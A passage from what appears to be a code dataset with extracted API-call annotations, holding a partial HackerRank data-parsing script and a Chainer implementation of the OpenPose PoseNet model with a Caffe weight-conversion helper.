(15669, 15718), False, 'import os\n'), ((15742, 15805), 'os.path.isfile', 'os.path.isfile', (['"""Output/TestProject_0.1.1_Release.unitypackage"""'], {}), "('Output/TestProject_0.1.1_Release.unitypackage')\n", (15756, 15805), False, 'import os\n'), ((16544, 16595), 'os.path.normpath', 'os.path.normpath', (['"""UnityProject/Assets/TestProject"""'], {}), "('UnityProject/Assets/TestProject')\n", (16560, 16595), False, 'import os\n'), ((16626, 16691), 'os.path.normpath', 'os.path.normpath', (['"""Output/TestProject_1.0.0_Release.unitypackage"""'], {}), "('Output/TestProject_1.0.0_Release.unitypackage')\n", (16642, 16691), False, 'import os\n'), ((18386, 18446), 'os.path.normpath', 'os.path.normpath', (['"""CustomUnityProject/Assets/MyUnityPackage"""'], {}), "('CustomUnityProject/Assets/MyUnityPackage')\n", (18402, 18446), False, 'import os\n'), ((18477, 18546), 'os.path.normpath', 'os.path.normpath', (['"""CustomOutput/TestProject_1.0.0_Debug.unitypackage"""'], {}), "('CustomOutput/TestProject_1.0.0_Debug.unitypackage')\n", (18493, 18546), False, 'import os\n'), ((20016, 20079), 'os.path.isfile', 'os.path.isfile', (['"""Output/TestProject_0.1.0_Release.unitypackage"""'], {}), "('Output/TestProject_0.1.0_Release.unitypackage')\n", (20030, 20079), False, 'import os\n'), ((19958, 19981), 'json.dumps', 'json.dumps', (['config_data'], {}), '(config_data)\n', (19968, 19981), False, 'import json\n')] |
#! /usr/bin/env python
import re
import pandas as pd
from numpy import interp
import os
from pathlib import Path
home = os.environ['HOME']
home_dir = Path(home)
work_dir = home_dir / 'Programming/Python/python-exercises/hackerrank'
# 12/14/2012 16:00:00 Missing_19
pattern = re.compile(r'(\d{1,2}/\d{1,2}/2012)\s+(16:00:00)\s+(Missing_\d{1,2})')
missing_list = []
with open(work_dir / 'data/readings.txt', 'r') as f:
lines = f.readlines()
for index, line in enumerate(lines):
# print(f'line: {line}')
missing_item = pattern.findall(line)
if missing_item:
# print(f'missing_item: {missing_item}')
date = pattern.sub(r'\1', line)
# print(f'date: {date}')
missing_list.append(date.rstrip())
reading_df = pd.read_csv(work_dir / 'data/readings.txt', sep=r'\s+',
names=['date', 'time', 'measurements'])
reading_df['date_time'] = reading_df[['date', 'time']].agg(' '.join, axis=1)
reading_df.drop(['date', 'time'], axis=1, inplace=True)
reading_df['date_time'] = pd.to_datetime(reading_df['date_time'], format=r'%m/%d/%Y %H:%M:%S')
# reading_df.set_index('date_time', inplace=True)
reading_df = reading_df[['date_time', 'measurements']]
print(reading_df.head())
print(reading_df.info())
# new_interp = interp(missing_list)
# print(f'missing_list: {missing_list}')
def calcMissing(readings):
pass
# if __name__ == '__main__':
# readings_count = int(input().strip())
# readings = []
# for _ in range(readings_count):
# readings_item = input()
# readings.append(readings_item)
# calcMissing(readings)
| [
"pandas.to_datetime",
"re.compile",
"pandas.read_csv",
"pathlib.Path"
] | [((152, 162), 'pathlib.Path', 'Path', (['home'], {}), '(home)\n', (156, 162), False, 'from pathlib import Path\n'), ((278, 352), 're.compile', 're.compile', (['"""(\\\\d{1,2}/\\\\d{1,2}/2012)\\\\s+(16:00:00)\\\\s+(Missing_\\\\d{1,2})"""'], {}), "('(\\\\d{1,2}/\\\\d{1,2}/2012)\\\\s+(16:00:00)\\\\s+(Missing_\\\\d{1,2})')\n", (288, 352), False, 'import re\n'), ((787, 886), 'pandas.read_csv', 'pd.read_csv', (["(work_dir / 'data/readings.txt')"], {'sep': '"""\\\\s+"""', 'names': "['date', 'time', 'measurements']"}), "(work_dir / 'data/readings.txt', sep='\\\\s+', names=['date',\n 'time', 'measurements'])\n", (798, 886), True, 'import pandas as pd\n'), ((1068, 1135), 'pandas.to_datetime', 'pd.to_datetime', (["reading_df['date_time']"], {'format': '"""%m/%d/%Y %H:%M:%S"""'}), "(reading_df['date_time'], format='%m/%d/%Y %H:%M:%S')\n", (1082, 1135), True, 'import pandas as pd\n')] |
from __future__ import print_function
import os
import itertools, pkg_resources, sys
from distutils.version import LooseVersion
if LooseVersion(pkg_resources.get_distribution("chainer").version) >= LooseVersion('7.0.0') and \
sys.version_info.major == 2:
print('''Please install chainer <= 7.0.0:
sudo pip install chainer==6.7.0
c.f https://github.com/jsk-ros-pkg/jsk_recognition/pull/2485
''', file=sys.stderr)
sys.exit(1)
if [p for p in list(itertools.chain(*[pkg_resources.find_distributions(_) for _ in sys.path])) if "cupy-" in p.project_name ] == []:
print('''Please install CuPy
sudo pip install cupy-cuda[your cuda version]
i.e.
sudo pip install cupy-cuda91
''', file=sys.stderr)
sys.exit(1)
import chainer
import chainer.functions as F
import chainer.links as L
base_url = 'http://posefs1.perception.cs.cmu.edu/OpenPose/models/pose/'
models = {
'auto': 'coco/pose_iter_440000.chainermodel',
'coco': 'coco/pose_iter_440000.chainermodel',
'mpi': 'mpi/pose_iter_160000.chainermodel',
}
class PoseNet(chainer.Chain):
def __init__(self, pretrained_model='auto'):
super(PoseNet, self).__init__()
with self.init_scope():
self.conv1_1 = L.Convolution2D(
in_channels=3, out_channels=64, ksize=3, stride=1, pad=1)
self.conv1_2 = L.Convolution2D(
in_channels=64, out_channels=64, ksize=3, stride=1, pad=1)
self.conv2_1 = L.Convolution2D(
in_channels=64, out_channels=128, ksize=3, stride=1, pad=1)
self.conv2_2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv3_1 = L.Convolution2D(
in_channels=128, out_channels=256, ksize=3, stride=1, pad=1)
self.conv3_2 = L.Convolution2D(
in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)
self.conv3_3 = L.Convolution2D(
in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)
self.conv3_4 = L.Convolution2D(
in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)
self.conv4_1 = L.Convolution2D(
in_channels=256, out_channels=512, ksize=3, stride=1, pad=1)
self.conv4_2 = L.Convolution2D(
in_channels=512, out_channels=512, ksize=3, stride=1, pad=1)
self.conv4_3_CPM = L.Convolution2D(
in_channels=512, out_channels=256, ksize=3, stride=1, pad=1)
self.conv4_4_CPM = L.Convolution2D(
in_channels=256, out_channels=128, ksize=3, stride=1, pad=1)
# stage1
self.conv5_1_CPM_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_2_CPM_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_3_CPM_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_4_CPM_L1 = L.Convolution2D(
in_channels=128, out_channels=512, ksize=1, stride=1, pad=0)
self.conv5_5_CPM_L1 = L.Convolution2D(
in_channels=512, out_channels=38, ksize=1, stride=1, pad=0)
self.conv5_1_CPM_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_2_CPM_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_3_CPM_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)
self.conv5_4_CPM_L2 = L.Convolution2D(
in_channels=128, out_channels=512, ksize=1, stride=1, pad=0)
self.conv5_5_CPM_L2 = L.Convolution2D(
in_channels=512, out_channels=19, ksize=1, stride=1, pad=0)
# stage2
self.Mconv1_stage2_L1 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage2_L1 = L.Convolution2D(
in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)
self.Mconv1_stage2_L2 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage2_L2 = L.Convolution2D(
in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)
# stage3
self.Mconv1_stage3_L1 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage3_L1 = L.Convolution2D(
in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)
self.Mconv1_stage3_L2 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage3_L2 = L.Convolution2D(
in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)
# stage4
self.Mconv1_stage4_L1 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage4_L1 = L.Convolution2D(
in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)
self.Mconv1_stage4_L2 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage4_L2 = L.Convolution2D(
in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)
# stage5
self.Mconv1_stage5_L1 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage5_L1 = L.Convolution2D(
in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)
self.Mconv1_stage5_L2 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage5_L2 = L.Convolution2D(
in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)
# stage6
self.Mconv1_stage6_L1 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage6_L1 = L.Convolution2D(
in_channels=128, out_channels=38, ksize=1, stride=1, pad=0)
self.Mconv1_stage6_L2 = L.Convolution2D(
in_channels=185, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv2_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv3_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv4_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv5_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=7, stride=1, pad=3)
self.Mconv6_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=128, ksize=1, stride=1, pad=0)
self.Mconv7_stage6_L2 = L.Convolution2D(
in_channels=128, out_channels=19, ksize=1, stride=1, pad=0)
if pretrained_model in models.keys():
data_dir = chainer.dataset.get_dataset_directory('openpose/pose')
model_path = os.path.join(data_dir, models[pretrained_model])
try:
os.makedirs(os.path.dirname(model_path))
except OSError:
pass
chainer.dataset.cache_or_load_file(
model_path,
lambda f: _download_pretrained_model(pretrained_model, f),
lambda f: f)
chainer.serializers.load_npz(model_path, self)
elif pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise OSError('model does not exists: "%s"' % pretrained_model)
chainer.serializers.load_npz(pretrained_model, self)
def __call__(self, x):
heatmaps = []
pafs = []
h = F.relu(self.conv1_1(x))
h = F.relu(self.conv1_2(h))
h = F.max_pooling_2d(h, ksize=2, stride=2)
h = F.relu(self.conv2_1(h))
h = F.relu(self.conv2_2(h))
h = F.max_pooling_2d(h, ksize=2, stride=2)
h = F.relu(self.conv3_1(h))
h = F.relu(self.conv3_2(h))
h = F.relu(self.conv3_3(h))
h = F.relu(self.conv3_4(h))
h = F.max_pooling_2d(h, ksize=2, stride=2)
h = F.relu(self.conv4_1(h))
h = F.relu(self.conv4_2(h))
h = F.relu(self.conv4_3_CPM(h))
h = F.relu(self.conv4_4_CPM(h))
feature_map = h
# stage1
h1 = F.relu(self.conv5_1_CPM_L1(feature_map)) # branch1
h1 = F.relu(self.conv5_2_CPM_L1(h1))
h1 = F.relu(self.conv5_3_CPM_L1(h1))
h1 = F.relu(self.conv5_4_CPM_L1(h1))
h1 = self.conv5_5_CPM_L1(h1)
h2 = F.relu(self.conv5_1_CPM_L2(feature_map)) # branch2
h2 = F.relu(self.conv5_2_CPM_L2(h2))
h2 = F.relu(self.conv5_3_CPM_L2(h2))
h2 = F.relu(self.conv5_4_CPM_L2(h2))
h2 = self.conv5_5_CPM_L2(h2)
pafs.append(h1)
heatmaps.append(h2)
# stage2
h = F.concat((h1, h2, feature_map), axis=1) # channel concat
h1 = F.relu(self.Mconv1_stage2_L1(h)) # branch1
h1 = F.relu(self.Mconv2_stage2_L1(h1))
h1 = F.relu(self.Mconv3_stage2_L1(h1))
h1 = F.relu(self.Mconv4_stage2_L1(h1))
h1 = F.relu(self.Mconv5_stage2_L1(h1))
h1 = F.relu(self.Mconv6_stage2_L1(h1))
h1 = self.Mconv7_stage2_L1(h1)
h2 = F.relu(self.Mconv1_stage2_L2(h)) # branch2
h2 = F.relu(self.Mconv2_stage2_L2(h2))
h2 = F.relu(self.Mconv3_stage2_L2(h2))
h2 = F.relu(self.Mconv4_stage2_L2(h2))
h2 = F.relu(self.Mconv5_stage2_L2(h2))
h2 = F.relu(self.Mconv6_stage2_L2(h2))
h2 = self.Mconv7_stage2_L2(h2)
pafs.append(h1)
heatmaps.append(h2)
# stage3
h = F.concat((h1, h2, feature_map), axis=1) # channel concat
h1 = F.relu(self.Mconv1_stage3_L1(h)) # branch1
h1 = F.relu(self.Mconv2_stage3_L1(h1))
h1 = F.relu(self.Mconv3_stage3_L1(h1))
h1 = F.relu(self.Mconv4_stage3_L1(h1))
h1 = F.relu(self.Mconv5_stage3_L1(h1))
h1 = F.relu(self.Mconv6_stage3_L1(h1))
h1 = self.Mconv7_stage3_L1(h1)
h2 = F.relu(self.Mconv1_stage3_L2(h)) # branch2
h2 = F.relu(self.Mconv2_stage3_L2(h2))
h2 = F.relu(self.Mconv3_stage3_L2(h2))
h2 = F.relu(self.Mconv4_stage3_L2(h2))
h2 = F.relu(self.Mconv5_stage3_L2(h2))
h2 = F.relu(self.Mconv6_stage3_L2(h2))
h2 = self.Mconv7_stage3_L2(h2)
pafs.append(h1)
heatmaps.append(h2)
# stage4
h = F.concat((h1, h2, feature_map), axis=1) # channel concat
h1 = F.relu(self.Mconv1_stage4_L1(h)) # branch1
h1 = F.relu(self.Mconv2_stage4_L1(h1))
h1 = F.relu(self.Mconv3_stage4_L1(h1))
h1 = F.relu(self.Mconv4_stage4_L1(h1))
h1 = F.relu(self.Mconv5_stage4_L1(h1))
h1 = F.relu(self.Mconv6_stage4_L1(h1))
h1 = self.Mconv7_stage4_L1(h1)
h2 = F.relu(self.Mconv1_stage4_L2(h)) # branch2
h2 = F.relu(self.Mconv2_stage4_L2(h2))
h2 = F.relu(self.Mconv3_stage4_L2(h2))
h2 = F.relu(self.Mconv4_stage4_L2(h2))
h2 = F.relu(self.Mconv5_stage4_L2(h2))
h2 = F.relu(self.Mconv6_stage4_L2(h2))
h2 = self.Mconv7_stage4_L2(h2)
pafs.append(h1)
heatmaps.append(h2)
# stage5
h = F.concat((h1, h2, feature_map), axis=1) # channel concat
h1 = F.relu(self.Mconv1_stage5_L1(h)) # branch1
h1 = F.relu(self.Mconv2_stage5_L1(h1))
h1 = F.relu(self.Mconv3_stage5_L1(h1))
h1 = F.relu(self.Mconv4_stage5_L1(h1))
h1 = F.relu(self.Mconv5_stage5_L1(h1))
h1 = F.relu(self.Mconv6_stage5_L1(h1))
h1 = self.Mconv7_stage5_L1(h1)
h2 = F.relu(self.Mconv1_stage5_L2(h)) # branch2
h2 = F.relu(self.Mconv2_stage5_L2(h2))
h2 = F.relu(self.Mconv3_stage5_L2(h2))
h2 = F.relu(self.Mconv4_stage5_L2(h2))
h2 = F.relu(self.Mconv5_stage5_L2(h2))
h2 = F.relu(self.Mconv6_stage5_L2(h2))
h2 = self.Mconv7_stage5_L2(h2)
pafs.append(h1)
heatmaps.append(h2)
# stage6
h = F.concat((h1, h2, feature_map), axis=1) # channel concat
h1 = F.relu(self.Mconv1_stage6_L1(h)) # branch1
h1 = F.relu(self.Mconv2_stage6_L1(h1))
h1 = F.relu(self.Mconv3_stage6_L1(h1))
h1 = F.relu(self.Mconv4_stage6_L1(h1))
h1 = F.relu(self.Mconv5_stage6_L1(h1))
h1 = F.relu(self.Mconv6_stage6_L1(h1))
h1 = self.Mconv7_stage6_L1(h1)
h2 = F.relu(self.Mconv1_stage6_L2(h)) # branch2
h2 = F.relu(self.Mconv2_stage6_L2(h2))
h2 = F.relu(self.Mconv3_stage6_L2(h2))
h2 = F.relu(self.Mconv4_stage6_L2(h2))
h2 = F.relu(self.Mconv5_stage6_L2(h2))
h2 = F.relu(self.Mconv6_stage6_L2(h2))
h2 = self.Mconv7_stage6_L2(h2)
pafs.append(h1)
heatmaps.append(h2)
return pafs, heatmaps
def _download_pretrained_model(model_type, dest_path):
from chainer.links import caffe
if os.path.exists(dest_path):
raise OSError('destination already exists: %s' % dest_path)
basename, ext = os.path.splitext(models[model_type])
url = base_url + basename + '.caffemodel'
caffe_model_path = chainer.dataset.cached_download(url)
if not os.path.exists(caffe_model_path):
raise OSError('caffe model does not exist: %s' % caffe_model_path)
print('Converting to chainer model')
caffe_model = caffe.CaffeFunction(caffe_model_path)
chainer_model = PoseNet(pretrained_model=None)
for link in chainer_model.links():
if not isinstance(link, chainer.Link) or not link.name:
continue
if eval('chainer_model.{0}.b.shape == caffe_model["{0}"].b.shape'.format(link.name)) and\
eval('chainer_model.{0}.W.shape == caffe_model["{0}"].W.shape'.format(link.name)):
exec('chainer_model.{0}.W.data = caffe_model["{0}"].W.data'.format(link.name))
exec('chainer_model.{0}.b.data = caffe_model["{0}"].b.data'.format(link.name))
print('Copied layer {0}'.format(link.name))
else:
print('Failed to copy layer {0}'.format(link.name))
chainer.serializers.save_npz(dest_path, chainer_model)
return True
| [
"chainer.links.Convolution2D",
"os.path.exists",
"chainer.dataset.cached_download",
"chainer.dataset.get_dataset_directory",
"chainer.functions.concat",
"chainer.serializers.save_npz",
"os.path.splitext",
"os.path.join",
"chainer.links.caffe.CaffeFunction",
"chainer.functions.max_pooling_2d",
"o... | [((428, 439), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (436, 439), False, 'import itertools, pkg_resources, sys\n'), ((720, 731), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (728, 731), False, 'import itertools, pkg_resources, sys\n'), ((19383, 19408), 'os.path.exists', 'os.path.exists', (['dest_path'], {}), '(dest_path)\n', (19397, 19408), False, 'import os\n'), ((19499, 19535), 'os.path.splitext', 'os.path.splitext', (['models[model_type]'], {}), '(models[model_type])\n', (19515, 19535), False, 'import os\n'), ((19605, 19641), 'chainer.dataset.cached_download', 'chainer.dataset.cached_download', (['url'], {}), '(url)\n', (19636, 19641), False, 'import chainer\n'), ((19822, 19859), 'chainer.links.caffe.CaffeFunction', 'caffe.CaffeFunction', (['caffe_model_path'], {}), '(caffe_model_path)\n', (19841, 19859), False, 'from chainer.links import caffe\n'), ((20548, 20602), 'chainer.serializers.save_npz', 'chainer.serializers.save_npz', (['dest_path', 'chainer_model'], {}), '(dest_path, chainer_model)\n', (20576, 20602), False, 'import chainer\n'), ((199, 220), 'distutils.version.LooseVersion', 'LooseVersion', (['"""7.0.0"""'], {}), "('7.0.0')\n", (211, 220), False, 'from distutils.version import LooseVersion\n'), ((14164, 14202), 'chainer.functions.max_pooling_2d', 'F.max_pooling_2d', (['h'], {'ksize': '(2)', 'stride': '(2)'}), '(h, ksize=2, stride=2)\n', (14180, 14202), True, 'import chainer.functions as F\n'), ((14287, 14325), 'chainer.functions.max_pooling_2d', 'F.max_pooling_2d', (['h'], {'ksize': '(2)', 'stride': '(2)'}), '(h, ksize=2, stride=2)\n', (14303, 14325), True, 'import chainer.functions as F\n'), ((14482, 14520), 'chainer.functions.max_pooling_2d', 'F.max_pooling_2d', (['h'], {'ksize': '(2)', 'stride': '(2)'}), '(h, ksize=2, stride=2)\n', (14498, 14520), True, 'import chainer.functions as F\n'), ((15271, 15310), 'chainer.functions.concat', 'F.concat', (['(h1, h2, feature_map)'], {'axis': '(1)'}), '((h1, h2, feature_map), axis=1)\n', (15279, 15310), True, 'import chainer.functions as F\n'), ((16073, 16112), 'chainer.functions.concat', 'F.concat', (['(h1, h2, feature_map)'], {'axis': '(1)'}), '((h1, h2, feature_map), axis=1)\n', (16081, 16112), True, 'import chainer.functions as F\n'), ((16875, 16914), 'chainer.functions.concat', 'F.concat', (['(h1, h2, feature_map)'], {'axis': '(1)'}), '((h1, h2, feature_map), axis=1)\n', (16883, 16914), True, 'import chainer.functions as F\n'), ((17677, 17716), 'chainer.functions.concat', 'F.concat', (['(h1, h2, feature_map)'], {'axis': '(1)'}), '((h1, h2, feature_map), axis=1)\n', (17685, 17716), True, 'import chainer.functions as F\n'), ((18479, 18518), 'chainer.functions.concat', 'F.concat', (['(h1, h2, feature_map)'], {'axis': '(1)'}), '((h1, h2, feature_map), axis=1)\n', (18487, 18518), True, 'import chainer.functions as F\n'), ((19653, 19685), 'os.path.exists', 'os.path.exists', (['caffe_model_path'], {}), '(caffe_model_path)\n', (19667, 19685), False, 'import os\n'), ((1218, 1291), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(3)', 'out_channels': '(64)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=3, out_channels=64, ksize=3, stride=1, pad=1)\n', (1233, 1291), True, 'import chainer.links as L\n'), ((1336, 1410), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(64)', 'out_channels': '(64)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=64, out_channels=64, ksize=3, stride=1, pad=1)\n', (1351, 1410), True, 'import chainer.links as L\n'), ((1455, 1530), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(64)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=64, out_channels=128, ksize=3, stride=1, pad=1)\n', (1470, 1530), True, 'import chainer.links as L\n'), ((1575, 1651), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=128, ksize=3, stride=1, pad=1)\n', (1590, 1651), True, 'import chainer.links as L\n'), ((1696, 1772), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(256)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=128, out_channels=256, ksize=3, stride=1, pad=1)\n', (1711, 1772), True, 'import chainer.links as L\n'), ((1817, 1893), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(256)', 'out_channels': '(256)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)\n', (1832, 1893), True, 'import chainer.links as L\n'), ((1938, 2014), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(256)', 'out_channels': '(256)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)\n', (1953, 2014), True, 'import chainer.links as L\n'), ((2059, 2135), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(256)', 'out_channels': '(256)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=256, out_channels=256, ksize=3, stride=1, pad=1)\n', (2074, 2135), True, 'import chainer.links as L\n'), ((2180, 2256), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(256)', 'out_channels': '(512)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=256, out_channels=512, ksize=3, stride=1, pad=1)\n', (2195, 2256), True, 'import chainer.links as L\n'), ((2301, 2377), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(512)', 'out_channels': '(512)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=512, out_channels=512, ksize=3, stride=1, pad=1)\n', (2316, 2377), True, 'import chainer.links as L\n'), ((2426, 2502), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(512)', 'out_channels': '(256)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=512, out_channels=256, ksize=3, stride=1, pad=1)\n', (2441, 2502), True, 'import chainer.links as L\n'), ((2551, 2627), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(256)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), '(in_channels=256, out_channels=128, ksize=3, stride=1, pad=1)\n', (2566, 2627), True, 'import chainer.links as L\n'), ((2701, 2777), 'chainer.links.Convolution2D', 'L.Convolution2D', ([], {'in_channels': '(128)', 'out_channels': '(128)', 'ksize': '(3)', 'stride': '(1)', 'pad': '(1)'}), 